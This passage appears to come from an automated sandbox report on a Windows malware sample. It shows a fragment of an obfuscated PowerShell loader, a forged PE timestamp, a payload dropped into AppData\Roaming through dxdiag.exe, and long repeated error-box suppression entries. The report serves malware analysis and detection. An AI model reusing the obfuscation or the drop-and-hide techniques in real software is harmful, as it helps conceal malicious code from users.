GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(JomfruJump to behavior
                Source: 31437F.exe.18.drStatic PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848CE51D3 pushad ; iretd 2_2_00007FF848CE52B9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848CE00BD pushad ; iretd 2_2_00007FF848CE00C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049D370F push eax; iretd 4_2_049D3749
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 18_3_05F69F7F push ebp; retf 000Ah18_3_05F69F84
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 18_3_05F68DE7 push ds; retf 18_3_05F68DE8
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 18_3_05F695C7 push cs; iretd 18_3_05F695C8
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 18_3_05F6B048 push eax; ret 18_3_05F6B049
                Source: C:\Windows\SysWOW64\dxdiag.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
